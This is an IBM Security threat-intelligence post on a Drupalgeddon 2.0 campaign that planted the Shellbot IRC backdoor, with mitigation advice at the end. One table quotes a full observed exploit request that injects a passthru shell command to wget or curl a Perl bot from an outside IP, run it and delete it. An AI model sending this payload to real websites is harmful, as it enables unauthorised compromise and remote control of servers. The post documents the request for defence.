IBM Security’s Managed Security Services (MSS) team monitors the enterprise threat landscape on an ongoing basis, detecting and mapping new threats as they emerge. In a recent investigation, our MSS intelligence analysts discovered that malicious actors are using recent Drupal vulnerabilities to target various websites and possibly the underlying infrastructure that hosts them, leveraging Shellbot to open backdoors.
This appears to be a financially motivated effort to mass-compromise websites. How can defenders keep websites and underlying systems safe in the face of these evolving threats?
What Is Drupal, and Why Is It a Target?
Like WordPress, Drupal is a content management system (CMS) that is used widely by people who create and maintain websites and applications for all sorts of purposes, both personal and business, private and public. Drupal is open source and, as such, is maintained by a community of users. This is also how its security and vulnerability patching is maintained.
CMSs that are used across a large number of websites are juicy targets for cybercriminals, who commonly automate their attacks in a one-size-fits-all type of operation. Those who target random websites aim to compromise as many as possible and consider the monetization options later.
To do that, malicious actors often pick a vulnerability and then probe for exploitable sites en masse. Those found unpatched or vulnerable for some other reason might fall under the attacker’s control, which could mean a complete compromise of that site. With this level of control, the attacker has access to the site as a resource from which to steal data, host malicious content or launch additional attacks.
ShellBot Attacks Open Backdoors With Drupalgeddon 2.0
In recent investigations into malicious activity targeting enterprises across the globe, our team detected an IP address that was repeatedly sending the same HTTP POST request:
|IP Address||Suspicious Request|
|18.104.22.168||/?q=user/password&name[#type]=markup&name[#markup]=cd /tmp;wget 22.214.171.124 /lip;perl;cd /tmp;curl -O 126.96.36.199 /lip;perl lip;rm -rf lip*&name[#post_render]=passthru|
Further examination of these requests revealed additional sources of similar traffic from a number of command-and-control (C&C) servers, hosting servers that download a Perl script to launch the Shellbot malware and a payload naming pattern that started to paint the picture of a widespread cyberattack. Our team traced the beginning of this campaign to mid-August 2018.
Scan and Deploy
Scanning websites for vulnerable configurations, the attackers leveraged a critical remote code execution (RCE) vulnerability known as CVE-2018-7600, or Drupalgeddon 2.0, to eventually open a backdoor using the Shellbot malware. The scan also included a second vulnerability, CVE-2018-7602, another highly critical RCE flaw. Both these flaws have been patched, but vulnerabilities persists as users delay in patching and upgrading.
As we continued to look into the attack, vulnerable websites were scanned for the /user/register and /user/password pages in the installation phase as attackers tried to brute-force their way in with existing user access details discovered while attempting to “wget” the Perl script for Backdoor.Shellbot.
When successful, the script ran a shell command injection that was used to install the Perl-based bot. The Shellbot instance in our investigation connected to an Internet Relay Chat (IRC) channel and used it as a C&C hub to receive instructions from its controller. The bot contained multiple tools to perform distributed denial-of-service (DDoS) attacks and search for SQL injection weaknesses and other vulnerabilities, including privilege escalation to reach root level on the victimized system.
The vulnerabilities used in this campaign were leveraged in an automated way, allowing attackers to scan a large number of websites with minimal effort. Moreover, if successfully exploited, the flaw could lead to a potential compromise of the web application with the possibility of spilling over to the underlying operating system as well.
Shellbot itself is an old code that has been around since about 2005, used maliciously to remotely access and control compromised endpoints. Shellbot can open remote command line shells, perform denial-of-service attacks, run tasks and processes, download additional files per the attacker’s command, and change the endpoint’s settings, to name a few.
Shellbot may seem dated and simplistic, but it is in active use by several threat groups. In March 2017, in the heat of Apache Struts (CVE-2017-5638), ShellBot was packaged as the C&C with the PowerBot malware, which deployed cryptocurrency mining modules on infected devices. This combination allowed criminals to generate over $100k in illicit profits from their schemes.
Reviewing most of the Shellbot malware attacks we have detected in recent months, our team identified some variants with instructions to:
- Terminate all running cryptocurrency mining activities before installing the attacker’s new cryptocurrency miner;
- Host phishing campaigns;
- Distribute phishing email spam;
- Carry out various types of DDoS attacks; and
- Exfiltrate data via a PHP module to a predetermined email address.
Attackers Bank on Old Vulnerabilities
It costs a lot of time and money to find or buy a zero-day flaw — two resources cybercriminals are typically not willing to invest. It is much more lucrative to use existing vulnerabilities such as Drupalgeddon and attack code in an automated way, especially when users delay patching and updating their applications.
Here are some tips from our security specialists on how to mitigate the risk from existing vulnerabilities and those who use them to compromise web resources and assets:
- Use updated protocols such as HTTPS and upgrade if need be.
- Update CMSs to the most recent version and use all available patches.
- Perform input validation checks on all web applications to ensure that shell commands cannot be executed by any end user. Validate on both client and server side to ensure that scripting and malicious code cannot run on the underlying server or database.
- Attackers will try to brute-force credentials; make sure that passwords are strong, encrypted and salted. Use two-factor authentication (2FA) to foil automated attacks.
Want to know more? Find indicators of compromise (IoCs) and more technical details about this campaign on X-Force Exchange.